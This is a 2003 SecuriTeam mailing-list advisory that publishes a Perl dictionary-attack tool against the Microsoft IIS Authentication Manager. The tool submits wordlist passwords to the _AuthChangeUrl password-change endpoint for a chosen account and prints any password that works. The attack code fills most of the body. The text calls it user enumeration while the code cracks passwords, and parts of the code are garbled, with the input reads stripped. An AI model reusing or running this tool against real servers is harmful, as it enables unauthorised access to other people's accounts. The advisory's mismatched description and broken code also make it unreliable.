[TOOL] Microsoft IIS Authentication Manager Account Confirmation Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 05/05/03
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 5 May 2003 17:33:37 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Microsoft IIS Authentication Manager Account Confirmation Vulnerability
------------------------------------------------------------------------
DETAILS
The following tool will use the aexp4b.htr script to enumerate the names
of the users currently present on a remote server.
Tool:
####################################################################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
http://www.gulftech.org
####################################################################
# This tool can be used to brute force user accounts via dictionary attack
on the Microsoft
# IIS Authentication Manager.
####################################################################
use LWP::UserAgent;
##################################################################### Time
to create the new LWP User Agent, Clear the screen, And print out the
scripts header
####################################################################
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;
####################################################################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
####################################################################
print "Host: ";
$host=;
chomp $host;
print "Domain: ";
$domain=;
chomp $domain;
print "Account: ";
$account=;
chomp $account;
print "Word List: ";
$list=;
chomp $list;
#####################################################################
Opens the wordlist and puts the data into an array. afterward setting the
count variables
####################################################################
open (DATAFILE, "$list");
@datafile = ;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;
&space;
print "Cracked Accounts\n";
print "----------------\n";
####################################################################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
####################################################################
while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
$req->content_type('application/x-www-form-urlencoded');
$req->content
("domain=$domain&acct=$account&old=$password&new=$password&new2=$password"
);
my $res = $ua->request($req);
$pattern = "Password successfully changed";
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
}
$count++;
}
#####################################################################
Thats all folks. Prints out the final details and footer. Rest is just the
subroutines :)
####################################################################
&space;
&footer;
sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr
[http://www.gulftech.org] \n";
print "-------------------------------------------------------------------
--- \n";
}
sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count \n";
}
sub space {
print "\n" x2;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:jeiar@kmfms.com> JeiAr.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
